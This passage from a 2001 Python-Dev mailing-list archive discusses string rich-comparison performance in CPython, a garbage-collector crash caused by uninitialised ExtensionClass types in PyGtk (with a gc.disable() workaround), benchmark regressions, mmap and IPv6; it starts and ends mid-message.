7.56 us +65.79% SecondPackageImport: 38.95 ms 7.79 us +50.68% SecondSubmoduleImport: 49.90 ms 9.98 us +35.05% SimpleComplexArithmetic: 58.95 ms 1.34 us +74.67% SimpleDictManipulation: SimpleFloatArithmetic: SimpleIntFloatArithmetic: SimpleIntegerArithmetic: SimpleListManipulation: 43.65 ms 0.81 us +15.63% SimpleLongArithmetic: 42.70 ms 1.29 us +53.32% SmallLists: 79.15 ms 1.55 us +56.89% SmallTuples: 66.65 ms 1.39 us +43.03% SpecialClassAttribute: SpecialInstanceAttribute: StringMappings: StringPredicates: StringSlicing: 39.00 ms 1.11 us +28.71% TryExcept: TryRaiseExcept: 50.60 ms 16.87 us +27.46% TupleSlicing: 37.90 ms 1.80 us +26.54% UnicodeMappings: UnicodePredicates: UnicodeProperties: UnicodeSlicing: ------------------------------------------------------------------------ Average round time: 3177.00 ms n/a *) measured against: 1.5.2 (rounds=10, warp=100) (As MAL did, I removed all the results were the difference is +/- 10%.) i-never-do-simple-complex-arithmetic-anyway-ly yr's, Jeremy From martin at loewis.home.cs.tu-berlin.de Thu May 17 08:12:18 2001 From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis) Date: Thu, 17 May 2001 08:12:18 +0200 Subject: [Python-Dev] Comparison speed In-Reply-To: References: Message-ID: <200105170612.f4H6CI703034@mira.informatik.hu-berlin.de> > OK, from what I understand, that makes no sense. Does it to you? After reviewing everything again, I think I now do: In the richcomp case, I have res = (*f1)(v, w, op); if (res != Py_NotImplemented) return res; f1 is string_richcompare, so I get 2 function calls inside do_richcmp: one to string_richcompare, the other one to string_compare, as my optimizations are not triggered in your example. If I set tp_richcompare of strings to 0, I get past this code, and do c = (*f)(v, w); if (PyErr_Occurred()) return NULL; return convert_3way_to_object(op, c); Here, I get 3 function calls: f is string_compare, then PyErr_Occurred, finally convert_3way_to_object, which converts {-1,0,1} x Op -> {Py_True, Py_False}. Indeed, when I inline convert_3way_to_object, I get the same speed in both cases (with the remaining differences attributed to measurement and gcc doing register usage differently in both functions). I'd still be in favour of giving strings a richcompare, since it allows to optimize what I think is the single most frequent case: Py_EQ on strings. With a control flow like if (a->ob_size != b->ob_size) goto False; if (a->ob_size == 0) goto True; if (a->ob_sval[0] != b->ob_sval[0]) goto False; if(memcmp(a->ob_sval, b->ob_sval, a->ob_size)) goto False; else goto True; we can reduce the number of function calls Regards, Martin From skip at pobox.com Thu May 17 08:42:41 2001 From: skip at pobox.com (skip at pobox.com) Date: Thu, 17 May 2001 01:42:41 -0500 Subject: [Python-Dev] GC and ExtensionClass - a summary of the problem and a workaround Message-ID: <15107.29409.242342.200378@beluga.mojam.com> Over the past couple days I've included python-dev on various messages in an ongoing thread about a segmentation violation I was getting with the new PyGtk2 wrappers. With some excellent assistance from the GC maestro, Neil Schemenauer, I finally know what's going on and I have a simple workaround that lets me get back to work. Here's a summary of the problem. When defining ExtensionClass types, you need to create and initialize a PyExtensionClass struct. It looks something like so: PyExtensionClass PyGtkTreeSortable_Type = { PyObject_HEAD_INIT(NULL) 0, /* ob_size */ "GtkTreeSortable", /* tp_name */ sizeof(PyPureMixinObject), /* tp_basicsize */ ... }; Note that the parameter to the PyObject_HEAD_INIT macro is NULL. It would normally be the address of a type object (e.g. &PyType_Type). However, Jim Fulton pointed out that on Windows you can't get the address of &PyType_Type object at compile time. Accordingly, ExtensionClass provides a PyExtensionClass_Export macro whose responsibility is, in part, to set the ob_type field appropriately at runtime. (I'm not sure why this Windows nit doesn't afflict other type declarations like PyTuple_Type. I'm sure others will know why. I just accept Jim's word as gospel and move on...) A problem arises if the garbage collector runs while the module initialization function is running, but before all the ob_type fields have been assigned their correct values. In this case, a one-element tuple representing the bases of a particular PyGtk extension class was traversed by the garbage collector. The workaround turns out to be exceedingly simple: import gc gc.disable() import gtk gc.enable() I can handle doing that from Python code for the time being and will leave it up to others to decide how, if at all, ExtensionClass should be changed to correct the problem. Skip From martin at loewis.home.cs.tu-berlin.de Thu May 17 08:41:15 2001 From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis) Date: Thu, 17 May 2001 08:41:15 +0200 Subject: [Python-Dev] Comparison speed In-Reply-To: References: Message-ID: <200105170641.f4H6fFn03235@mira.informatik.hu-berlin.de> > 1. String objects are also equal despite being different objects, > if their ob_sinterned pointers are equal and non-NULL. So if > you're looking for every trick in & out of the book, that's > another one. That does not help. In the entire test suite, there are 0 instances where strings are compared which are not identical, but have equal ob_sinterned pointers. > > So 5% of the calls are with identical strings, for which I can > > immediately decide the outcome. > > But also at the cost of doing a fruitless compare and branch in 95% > of calls. Whether there's a fruitless branch depends on your compiler. With gcc 3, you can write if (__builtin_expect(a == b, 0)) { and then the body of the if block will be moved out of the way of linear control flow. > Any idea where those 800,000 virgin calls to oldcomp are coming > from? That's a lot. As far as I could trace it, most of them come from lookdict_string (at various locations inside this function). > > #comps: 2949421 > > #memcmps: 917776 > > > > So still, ca. 30% can be decided by first byte. > > Sorry, I couldn't follow this part, except noting that 917776 is about 30% of > 2949421, in which case I would have expected you to say that 70% can be > decided by first byte. Oops, you are right. > It's clearer that this is going to hurt sorting (& bisect etc), by > adding yet another layer of function call to get Py_LT resolved (as > for dict compares too, the string richcmp can't do anything to speed > up Py_LT that string oldcmp can't do just as efficiently -- indeed, > that's the great advantage oldcmp's "compare first character" test > had: that *can* decide Py_LT in one byte much of the time (but > length comparison cannot)). So to support sorting better, I should special-case Py_LT in string_richcompare also, to avoid the function call ?-) > Note too earlier mail about how adding a richcmp slot to strings will > suddenly slow cmp(string1, string2) (which is the usual way to program a > search tree, because cmp() *used* to call a string comparison routine only > once; but after adding a richcmp slot, each cmp(string1, string2) will call > the richcmp slot from 1 thru 3 times (data-dependent)). Yes, that is a serious problem. Fortunately, very few calls in my programs go to string_compare through cmp() now. But then, your programs are different, of course... Regards, Martin From mal at lemburg.com Thu May 17 08:54:37 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Thu, 17 May 2001 08:54:37 +0200 Subject: [Python-Dev] GC and ExtensionClass - a summary of the problem and a workaround References: <15107.29409.242342.200378@beluga.mojam.com> Message-ID: <3B0375AD.24E039B0@lemburg.com> skip at pobox.com wrote: > > Over the past couple days I've included python-dev on various messages in an > ongoing thread about a segmentation violation I was getting with the new > PyGtk2 wrappers. With some excellent assistance from the GC maestro, Neil > Schemenauer, I finally know what's going on and I have a simple workaround > that lets me get back to work. Here's a summary of the problem. > > When defining ExtensionClass types, you need to create and initialize a > PyExtensionClass struct. It looks something like so: > > PyExtensionClass PyGtkTreeSortable_Type = { > PyObject_HEAD_INIT(NULL) > 0, /* ob_size */ > "GtkTreeSortable", /* tp_name */ > sizeof(PyPureMixinObject), /* tp_basicsize */ > ... > }; > > Note that the parameter to the PyObject_HEAD_INIT macro is NULL. It would > normally be the address of a type object (e.g. &PyType_Type). However, Jim > Fulton pointed out that on Windows you can't get the address of &PyType_Type > object at compile time. Accordingly, ExtensionClass provides a > PyExtensionClass_Export macro whose responsibility is, in part, to set the > ob_type field appropriately at runtime. (I'm not sure why this Windows nit > doesn't afflict other type declarations like PyTuple_Type. I'm sure others > will know why. I just accept Jim's word as gospel and move on...) > > A problem arises if the garbage collector runs while the module > initialization function is running, but before all the ob_type fields have > been assigned their correct values. In this case, a one-element tuple > representing the bases of a particular PyGtk extension class was traversed > by the garbage collector. I wonder how the GC collector could "see" the type object before it has been initialized... since PyGtkTreeSortable_Type is a static C array and not a known PyObject until you add it to some Python dictionary as type object or use it for creating instances, it seems strange that the GC collector can reach out for it and get hit by the fact that it is not yet properly initialized. Some logic in PyExtensionClass_Export() or the GTK module must be twisted. > The workaround turns out to be exceedingly simple: > > import gc > gc.disable() > import gtk > gc.enable() > > I can handle doing that from Python code for the time being and will leave > it up to others to decide how, if at all, ExtensionClass should be changed > to correct the problem. -- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From fredrik at effbot.org Thu May 17 09:00:20 2001 From: fredrik at effbot.org (Fredrik Lundh) Date: Thu, 17 May 2001 09:00:20 +0200 Subject: [Python-Dev] GC and ExtensionClass - a summary of the problem and a workaround References: <15107.29409.242342.200378@beluga.mojam.com> Message-ID: <00c101c0de9f$0a6c4d10$e46940d5@hagrid> Skip wrote: > When defining ExtensionClass types, you need to create and initialize a > PyExtensionClass struct. It looks something like so: > > PyExtensionClass PyGtkTreeSortable_Type = { > PyObject_HEAD_INIT(NULL) > 0, /* ob_size */ > "GtkTreeSortable", /* tp_name */ > sizeof(PyPureMixinObject), /* tp_basicsize */ > ... > }; > > Note that the parameter to the PyObject_HEAD_INIT macro is NULL. It would > normally be the address of a type object (e.g. &PyType_Type). However, Jim > Fulton pointed out that on Windows you can't get the address of &PyType_Type > object at compile time. Accordingly, ExtensionClass provides a > PyExtensionClass_Export macro whose responsibility is, in part, to set the > ob_type field appropriately at runtime footnote: this is usually done in the module init function, *before* the call to Py_InitModule. see: http://www.python.org/doc/FAQ.html#3.24 if the garbage collector can run after Python calls a module's init- function, but before that module calls back into Python, anything can happen... Cheers /F From skip at pobox.com Thu May 17 09:04:06 2001 From: skip at pobox.com (skip at pobox.com) Date: Thu, 17 May 2001 02:04:06 -0500 Subject: [Python-Dev] GC and ExtensionClass - a summary of the problem and a workaround In-Reply-To: <3B0375AD.24E039B0@lemburg.com> References: <15107.29409.242342.200378@beluga.mojam.com> <3B0375AD.24E039B0@lemburg.com> Message-ID: <15107.30694.131193.989215@beluga.mojam.com> mal> I wonder how the GC collector could "see" the type object before it mal> has been initialized... since PyGtkTreeSortable_Type is a static C mal> array and not a known PyObject until you add it to some Python mal> dictionary as type object or use it for creating instances, it mal> seems strange that the GC collector can reach out for it and get mal> hit by the fact that it is not yet properly initialized. It is actually PyGtkWidget_Type that is not yet initialized when it is placed in the bases tuple for one of its subclasses. GC traverses that tuple, then dives into each element. It hits the PyGtkWidget_Type object, whose ob_type field has not yet been initialized. The actual object whose bases tuple is being traversed is (in all the crashes I encountered), GdkDragContext. The ordering of the registration calls could perhaps be reordered. Currently GdkDragContext is patched up before GtkWidget, its base class. This code is generated by James Henstridge's wrapper code generator, so perhaps he can maintain the necessary class hierarchy relationships and insure that base classes are initialized before their subclasses. Skip From skip at pobox.com Thu May 17 09:07:15 2001 From: skip at pobox.com (skip at pobox.com) Date: Thu, 17 May 2001 02:07:15 -0500 Subject: [Python-Dev] GC and ExtensionClass - a summary of the problem and a workaround In-Reply-To: <00c101c0de9f$0a6c4d10$e46940d5@hagrid> References: <15107.29409.242342.200378@beluga.mojam.com> <00c101c0de9f$0a6c4d10$e46940d5@hagrid> Message-ID: <15107.30883.680397.280556@beluga.mojam.com> Fredrik> footnote: this is usually done in the module init function, Fredrik> *before* the call to Py_InitModule. see: Fredrik> http://www.python.org/doc/FAQ.html#3.24 Fredrik> if the garbage collector can run after Python calls a module's Fredrik> init- function, but before that module calls back into Python, Fredrik> anything can happen... Thanks for pointing that out. Py_InitModule is indeed called before the fixup occurs. Skip From mal at lemburg.com Thu May 17 09:09:38 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Thu, 17 May 2001 09:09:38 +0200 Subject: [Python-Dev] GC and ExtensionClass - a summary of the problem and a workaround References: <15107.29409.242342.200378@beluga.mojam.com> <3B0375AD.24E039B0@lemburg.com> <15107.30694.131193.989215@beluga.mojam.com> Message-ID: <3B037932.476F475A@lemburg.com> skip at pobox.com wrote: > > mal> I wonder how the GC collector could "see" the type object before it > mal> has been initialized... since PyGtkTreeSortable_Type is a static C > mal> array and not a known PyObject until you add it to some Python > mal> dictionary as type object or use it for creating instances, it > mal> seems strange that the GC collector can reach out for it and get > mal> hit by the fact that it is not yet properly initialized. > > It is actually PyGtkWidget_Type that is not yet initialized when it is > placed in the bases tuple for one of its subclasses. GC traverses that > tuple, then dives into each element. It hits the PyGtkWidget_Type object, > whose ob_type field has not yet been initialized. The actual object whose > bases tuple is being traversed is (in all the crashes I encountered), > GdkDragContext. The ordering of the registration calls could perhaps be > reordered. Currently GdkDragContext is patched up before GtkWidget, its > base class. This code is generated by James Henstridge's wrapper code > generator, so perhaps he can maintain the necessary class hierarchy > relationships and insure that base classes are initialized before their > subclasses. Wouldn't it be easier to simply set the ob_type fields right at the start of the initGtk() function ? This is what I do for all my extensions and I've never seen any problems with it. -- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From james at daa.com.au Thu May 17 09:18:23 2001 From: james at daa.com.au (James Henstridge) Date: Thu, 17 May 2001 15:18:23 +0800 (WST) Subject: [Python-Dev] Re: GC and ExtensionClass - a summary of the problem and a workaround In-Reply-To: <15107.29409.242342.200378@beluga.mojam.com> Message-ID: On Thu, 17 May 2001 skip at pobox.com wrote: > > Over the past couple days I've included python-dev on various messages in an > ongoing thread about a segmentation violation I was getting with the new > PyGtk2 wrappers. With some excellent assistance from the GC maestro, Neil > Schemenauer, I finally know what's going on and I have a simple workaround > that lets me get back to work. Here's a summary of the problem. > > When defining ExtensionClass types, you need to create and initialize a > PyExtensionClass struct. It looks something like so: > > PyExtensionClass PyGtkTreeSortable_Type = { > PyObject_HEAD_INIT(NULL) > 0, /* ob_size */ > "GtkTreeSortable", /* tp_name */ > sizeof(PyPureMixinObject), /* tp_basicsize */ > ... > }; > > Note that the parameter to the PyObject_HEAD_INIT macro is NULL. It would > normally be the address of a type object (e.g. &PyType_Type). However, Jim > Fulton pointed out that on Windows you can't get the address of &PyType_Type > object at compile time. Accordingly, ExtensionClass provides a > PyExtensionClass_Export macro whose responsibility is, in part, to set the > ob_type field appropriately at runtime. (I'm not sure why this Windows nit > doesn't afflict other type declarations like PyTuple_Type. I'm sure others > will know why. I just accept Jim's word as gospel and move on...) Well, for Extension Classes, PyType_Type is not correct either. And because ExtensionClass is loaded at runtime, we can't set the ob_type field in the initialiser even on Unix systems. > > A problem arises if the garbage collector runs while the module > initialization function is running, but before all the ob_type fields have > been assigned their correct values. In this case, a one-element tuple > representing the bases of a particular PyGtk extension class was traversed > by the garbage collector. > > The workaround turns out to be exceedingly simple: > > import gc > gc.disable() > import gtk > gc.enable() > > I can handle doing that from Python code for the time being and will leave > it up to others to decide how, if at all, ExtensionClass should be changed > to correct the problem. Thanks for debugging this problem Skip. If we don't find a correct solution to the problem, I can put the gc disable/enable calls inside the gtk/__init__.py module. James. From mal at lemburg.com Thu May 17 09:26:32 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Thu, 17 May 2001 09:26:32 +0200 Subject: [Python-Dev] Performance compares References: Message-ID: <3B037D27.E258C363@lemburg.com> Tim Peters wrote: > > [MAL] > > Since it is possible that these figures result from my specific > > machine setup, I'd like to know what other people see on their > > machines. > > Is this the same machine where you were able to get 15% difference a few > years ago by adding or removing an unreachable printf in ceval.c (or was that > Vladimir)? If so, I bet it's degenerated to random 50% difference since then > . That must have been Valdimir's machine... even though I do admit that some small reordering changes do result in speedups of up to 10% -- probably due to the compiler accidentally creating code which the CPUs cache management likes. > My Win98SE box is *astonishingly* useless for timings. Without fail, the > first time I run pystone after a reboot yields a result a solid 50% higher > than the second or subsequent times I run it (yes, it's major-league *slower* > the second time). This is true across dozens of trials over several months, > and across all versions of Python. On Linux the situation is somewhat different; still I'm executing the tests 10-times each and for the figures I posted, I even ran pybench twice and only took the second readings as basis. > And simple little loops routinely vary in reported runtime by a factor of 3. > I may have to dig my old Win95 box out of the packing crate <0.6 wink>. > > None of that changes, of course, that the numbers you got are scary. Sure are... but I'm not so much interested in the absolute numbers -- it's the hot-spots which showed up that scare me: e.g. dictionary creation seems to have suffered along the way for some reason, functions calls are even slower now than they were previously and other important tasks such a instance creation take a similar hit (probably as a result of the other two). Running the same test for 2.1 vs. 2.0 there's not much to notice, so the important changes seem to be originating in the move from 1.5.2 to 2.0. -- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From james at daa.com.au Thu May 17 09:33:17 2001 From: james at daa.com.au (James Henstridge) Date: Thu, 17 May 2001 15:33:17 +0800 (WST) Subject: [Python-Dev] GC and ExtensionClass - a summary of the problem and a workaround In-Reply-To: <00c101c0de9f$0a6c4d10$e46940d5@hagrid> Message-ID: On Thu, 17 May 2001, Fredrik Lundh wrote: > footnote: this is usually done in the module init function, *before* > the call to Py_InitModule. see: The PyExtensionClass_Export() function requires a pointer to the module dictionary so that it can add itself to the module. Unfortunately this requires that Py_InitModule to have been called before hand. I guess this means that the current ExtensionClass API will need to be modified in order to allow ExtensionClasses to be initialised before Py_InitModule. > > http://www.python.org/doc/FAQ.html#3.24 > > if the garbage collector can run after Python calls a module's init- > function, but before that module calls back into Python, anything > can happen... James. From mwh at python.net Thu May 17 09:43:38 2001 From: mwh at python.net (Michael Hudson) Date: 17 May 2001 08:43:38 +0100 Subject: [Python-Dev] Performance compares In-Reply-To: "M.-A. Lemburg"'s message of "Thu, 17 May 2001 09:26:32 +0200" References: <3B037D27.E258C363@lemburg.com> Message-ID: "M.-A. Lemburg" writes: > Sure are... but I'm not so much interested in the absolute numbers > -- it's the hot-spots which showed up that scare me: e.g. dictionary > creation seems to have suffered along the way for some reason, > functions calls are even slower now than they were previously and > other important tasks such a instance creation take a similar hit > (probably as a result of the other two). Have you tried fiddling with gc parameters? If the GC does a multi generation trawl through the heap in the middle of some test, that might skew the numbers in unexpected ways. Or not, of course. Cheers, M. -- CLiki pages can be edited by anybody at any time. Imagine the most fearsomely comprehensive legal disclaimer you have ever seen, and double it -- http://ww.telent.net/cliki/index From mal at lemburg.com Thu May 17 11:03:06 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Thu, 17 May 2001 11:03:06 +0200 Subject: [Python-Dev] Performance compares References: <3B037D27.E258C363@lemburg.com> Message-ID: <3B0393CA.7B0E024C@lemburg.com> Michael Hudson wrote: > > "M.-A. Lemburg" writes: > > > Sure are... but I'm not so much interested in the absolute numbers > > -- it's the hot-spots which showed up that scare me: e.g. dictionary > > creation seems to have suffered along the way for some reason, > > functions calls are even slower now than they were previously and > > other important tasks such a instance creation take a similar hit > > (probably as a result of the other two). > > Have you tried fiddling with gc parameters? If the GC does a multi > generation trawl through the heap in the middle of some test, that > might skew the numbers in unexpected ways. > > Or not, of course. No, I haven't tried fiddling with those. I'm not sure I want to either ;-) ... the reason is that applications won't switch off GC for execution and so the tests is closer to real life. Still, I'll rerun the test suite using gc.disable() and post the results. -- Marc-Andre Lemburg CEO eGenix.com Software GmbH ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From mal at lemburg.com Thu May 17 11:18:36 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Thu, 17 May 2001 11:18:36 +0200 Subject: [Python-Dev] Performance compares References: <3B037D27.E258C363@lemburg.com> <3B0393CA.7B0E024C@lemburg.com> Message-ID: <3B03976C.CF47961@lemburg.com> "M.-A. Lemburg" wrote: > > Michael Hudson wrote: > > > > "M.-A. Lemburg" writes: > > > > > Sure are... but I'm not so much interested in the absolute numbers > > > -- it's the hot-spots which showed up that scare me: e.g. dictionary > > > creation seems to have suffered along the way for some reason, > > > functions calls are even slower now than they were previously and > > > other important tasks such a instance creation take a similar hit > > > (probably as a result of the other two). > > > > Have you tried fiddling with gc parameters? If the GC does a multi > > generation trawl through the heap in the middle of some test, that > > might skew the numbers in unexpected ways. > > > > Or not, of course. > > No, I haven't tried fiddling with those. I'm not sure I want > to either ;-) ... the reason is that applications won't switch > off GC for execution and so the tests is closer to real life. > > Still, I'll rerun the test suite using gc.disable() and post the > results. Turns out, the difference is not noticable (< 1%). -- Marc-Andre Lemburg CEO eGenix.com Software GmbH ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From gmcm at hypernet.com Thu May 17 15:00:27 2001 From: gmcm at hypernet.com (Gordon McMillan) Date: Thu, 17 May 2001 09:00:27 -0400 Subject: [Python-Dev] GC and ExtensionClass - a summary of the problem and a workaround In-Reply-To: <15107.29409.242342.200378@beluga.mojam.com> Message-ID: <3B03932B.8219.CCBF9F3F@localhost> [Skip] > Note that the parameter to the PyObject_HEAD_INIT macro is NULL. > It would normally be the address of a type object (e.g. > &PyType_Type). However, Jim Fulton pointed out that on Windows > you can't get the address of &PyType_Type object at compile time. This is MS being passive-aggressive. If you tell MSVC the source is C++, it will magically find the address of PyType_Type at compile time, but their language lawyers apparently believe the C spec disallows this. Standards conformant and incompatible - what-MS-calls-"win-win"-ly y'rs - Gordon From guido at digicool.com Thu May 17 16:04:59 2001 From: guido at digicool.com (Guido van Rossum) Date: Thu, 17 May 2001 09:04:59 -0500 Subject: [Python-Dev] Comparison speed In-Reply-To: Your message of "Thu, 17 May 2001 08:12:18 +0200." <200105170612.f4H6CI703034@mira.informatik.hu-berlin.de> References: <200105170612.f4H6CI703034@mira.informatik.hu-berlin.de> Message-ID: <200105171405.JAA14836@cj20424-a.reston1.va.home.com> > I'd still be in favour of giving strings a richcompare, since it > allows to optimize what I think is the single most frequent case: > Py_EQ on strings. I have always thought that eventually (but long before Py3K!) all objects would only support rich comparisons and the __cmp__ and tp_compare slots would become completely obsolete. I realize I probably haven't expressed this thought clearly, and I'm not going to push for this to happen quickly or forecefully, but it's nevertheless how I see things. I expect it would allow a tremendous cleanup of the comparison code. It will never reach the simplicity of cmp() -- but think of Einstein's (?) rule "things should be as simple as they can be, but no simpler." Clearly cmp() was too simple. :-) Anyway, it worries me whenever I hear someone express the thought that adding rich comparisons to a particular object type would be a bad idea because it would slow things down. --Guido van Rossum (home page: http://www.python.org/~guido/) From guido at digicool.com Thu May 17 16:37:30 2001 From: guido at digicool.com (Guido van Rossum) Date: Thu, 17 May 2001 10:37:30 -0400 Subject: [Python-Dev] GC and ExtensionClass - a summary of the problem and a workaround In-Reply-To: Your message of "Thu, 17 May 2001 09:00:27 EDT." <3B03932B.8219.CCBF9F3F@localhost> References: <3B03932B.8219.CCBF9F3F@localhost> Message-ID: <200105171437.f4HEbUB09503@odiug.digicool.com> > [Skip] > > > Note that the parameter to the PyObject_HEAD_INIT macro is NULL. > > It would normally be the address of a type object (e.g. > > &PyType_Type). However, Jim Fulton pointed out that on Windows > > you can't get the address of &PyType_Type object at compile time. > > This is MS being passive-aggressive. If you tell MSVC the > source is C++, it will magically find the address of > PyType_Type at compile time, but their language lawyers > apparently believe the C spec disallows this. Standards > conformant and incompatible - > > what-MS-calls-"win-win"-ly y'rs > > - Gordon I don't think MS blames it on the language spec so much; it's probably more that they use the spec as an excuse not to fix their implementation. The problem only occurs when the definition of the symbol is in a different DLL than the reference. This is why built-in types like PyTuple_Type don't have this problem. I guess for C++ they have to do a dynamic initializer anyway, so they can make this work, but they haven't bothered to make it work for C. My other point is that Skip's problem is clearly a gtk bug: it shouldn't have exposed the type before fully initializing it. --Guido van Rossum (home page: http://www.python.org/~guido/) From james at daa.com.au Thu May 17 16:48:43 2001 From: james at daa.com.au (James Henstridge) Date: Thu, 17 May 2001 22:48:43 +0800 (WST) Subject: [Python-Dev] GC and ExtensionClass - a summary of the problem and a workaround In-Reply-To: <200105171437.f4HEbUB09503@odiug.digicool.com> Message-ID: On Thu, 17 May 2001, Guido van Rossum wrote: > My other point is that Skip's problem is clearly a gtk bug: it > shouldn't have exposed the type before fully initializing it. On further investigation, it turned out that it was caused by a bug in my code generator that caused one extension class to be initialised before its base class (in fact, that particular extension class shouldn't have had any base classes). It was just the cyclic GC code triggering the bug. It will be fixed in the next snapshot of pygtk for GTK+ 2.0 James. -- Email: james at daa.com.au WWW: http://www.daa.com.au/~james/ From guido at digicool.com Thu May 17 16:52:54 2001 From: guido at digicool.com (Guido van Rossum) Date: Thu, 17 May 2001 10:52:54 -0400 Subject: [Python-Dev] GC and ExtensionClass - a summary of the problem and a workaround In-Reply-To: Your message of "Thu, 17 May 2001 22:48:43 +0800." References: Message-ID: <200105171452.f4HEqse09691@odiug.digicool.com> > On further investigation, it turned out that it was caused by a bug in my > code generator that caused one extension class to be initialised before > its base class (in fact, that particular extension class shouldn't have > had any base classes). It was just the cyclic GC code triggering the bug. > > It will be fixed in the next snapshot of pygtk for GTK+ 2.0 Excellent news, James! I love the open source process! --Guido van Rossum (home page: http://www.python.org/~guido/) From barry at digicool.com Thu May 17 17:04:50 2001 From: barry at digicool.com (Barry A. Warsaw) Date: Thu, 17 May 2001 11:04:50 -0400 Subject: [Python-Dev] GC and ExtensionClass - a summary of the problem and a workaround References: <200105171452.f4HEqse09691@odiug.digicool.com> Message-ID: <15107.59538.421007.37251@anthem.wooz.org> >>>>> "GvR" == Guido van Rossum writes: GvR> Excellent news, James! I love the open source process! No kidding! http://perens.com/Articles/StandTogether.html :) From Barrett at stsci.edu Thu May 17 16:56:49 2001 From: Barrett at stsci.edu (Paul Barrett) Date: Thu, 17 May 2001 10:56:49 -0400 Subject: [Python-Dev] mmap module Message-ID: <3B03E6B1.A19F6594@STScI.Edu> In the CVS log of the mmapmodule.c, Tim Peters says: "The code really needs to be rethought from scratch (not by me, though ...)." Well, I might be the person to do the rethinking, but I'd first like to know what Tim has in mind. I've been playing around with this module lately and tend to agree that some enhancements could be made, particularly to prevent "bus errors" and "segmentation faults". The ability to have offsets into a file that are not multiples of the system pagesize would also be nice. I'd be willing to submit a PEP on a new mmapmodule, once I know what others would like. -- Paul -- Paul Barrett, PhD Space Telescope Science Institute Phone: 410-338-4475 ESS/Science Software Group FAX: 410-338-4767 Baltimore, MD 21218 From tim.one at home.com Thu May 17 18:02:38 2001 From: tim.one at home.com (Tim Peters) Date: Thu, 17 May 2001 12:02:38 -0400 Subject: [Python-Dev] Comparison speed In-Reply-To: <200105171405.JAA14836@cj20424-a.reston1.va.home.com> Message-ID: [Guido] > I have always thought that eventually (but long before Py3K!) all > objects would only support rich comparisons and the __cmp__ and > tp_compare slots would become completely obsolete. I realize I > probably haven't expressed this thought clearly, and I'm not going to > push for this to happen quickly or forecefully, but it's nevertheless > how I see things. I expect it would allow a tremendous cleanup of the > comparison code. It will never reach the simplicity of cmp() -- but > think of Einstein's (?) rule "things should be as simple as they can > be, but no simpler." Clearly cmp() was too simple. :-) > > Anyway, it worries me whenever I hear someone express the thought that > adding rich comparisons to a particular object type would be a bad > idea because it would slow things down. At the moment, "almost all" comparisons in the dynamic sense have no need of richcmps, so clearly "Clearly cmp() was too simple. :-)" was too simple . For now richcmps are a tail-wagging-the-dog phenomenon, or more like the tail growing 10 pounds of dense matted hair, making the once-frisky puppy slow to a crawl because its butt is scraping the ground . Martin and I can resolve our differences wrt strings via getting rid of old strcmp entirely. Do you like the implications? 1. Code using cmp(string1, string2) will clearly run significantly slower, calling string comparison 1 (when == obtains), 2 (when < obtains), or 3 (when > obtains) times instead of always once only. Since == is the least likely outcome when using cmp() on strings (you can conclude that by instrumenting Python, or by common sense <0.5 wink>), the number of string compare calls more than doubles in practice for string cmp()-slinging programs (which includes existing well-written tree-based lookup schemes). 2. String dictionary lookup will, unlike the general non-dict case Martin instrumented, never pass the new "are the pointers the same?" richcmp Py_EQ test (because dict lookup already makes that test inline). So if old strcmp goes away, dict lookups that have to resort to strcmp will start paying for hopeless tests. OTOH, the "pointers equal?" test looks of dubious value for the non-dict string case anyway (where it succeeded only 1 in 20 times). #2 is a special case that can be special-cased to death, but #1 likely applies to code using cmp() for comparisons of objects of any type, and that's the primary reason I've resisted adding richcmps to the heavily-compared types (variously string, int, float, long, and type objects). Also the case that adding "a fast path" shouldn't have to endure wading thru multiple gimmicks (kinda defeats the idea of "fast" ), so the instant *one* heavily-compared basic type grows a richcmp (there are 0 such today), all should. So that's what I'll aim at. From guido at digicool.com Thu May 17 20:18:27 2001 From: guido at digicool.com (Guido van Rossum) Date: Thu, 17 May 2001 14:18:27 -0400 Subject: [Python-Dev] IPv6 Message-ID: <200105171818.f4HIIRv12891@odiug.digicool.com> What's out IPv6 story? I recall that someone once sent me patches, but they didn't work for me. Is it time to try again? In certain circles IPv6 support in Python would be enough to switch programming languages... :-) --Guido van Rossum (home page: http://www.python.org/~guido/) From martin at loewis.home.cs.tu-berlin.de Thu May 17 21:45:29 2001 From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis) Date: Thu, 17 May 2001 21:45:29 +0200 Subject: [Python-Dev] Comparison speed In-Reply-To: References: Message-ID: <200105171945.f4HJjTj01942@mira.informatik.hu-berlin.de> > 1. Code using cmp(string1, string2) will clearly run significantly > slower, calling string comparison 1 (when == obtains), 2 (when < > obtains), or 3 (when > obtains) times instead of always once only. I'd like to question the rationale behind this procedure. If a type has both tp_compare and tp_richcompare, and the application is performing cmp(o1, o2): Why is it then a good thing to emulate 3way compare using rich compare? I just changed the order in do_cmp, to the IMO more correct if (v->ob_type == w->ob_type && (f = v->ob_type->tp_compare) != NULL) return (*f)(v, w); c = try_rich_to_3way_compare(v, w); if (c < 2) return c; c = try_3way_compare(v, w); if (c < 2) return c; return default_3way_compare(v, w); With that, I got only a single failure in the test suite: test_userlist fails with exceptions.RuntimeError: UserList.__cmp__() is obsolete Tim thinks this is a bug in UserList, since __cmp__ is not obsolete; I agree. According to the CVS log, this implementation of do_cmp was installed in object.c 2.105, by gvanrossum, on 2001/01/17. What was the specific rationale for doing do_cmp in that order? Regards, Martin From tim at digicool.com Fri May 18 00:55:19 2001 From: tim at digicool.com (Tim Peters) Date: Thu, 17 May 2001 18:55:19 -0400 Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares) Message-ID: The worst percentage hit in both MAL's and Jeremy's pybench run was (here showing Jeremy's numbers, cuz I doubt anyone could reproduce MAL's ): DictCreation: 87.80 ms 2.93 us +115.72% Assorted things do not account for it: the new overhead of linking and unlinking dicts into the gc list (at 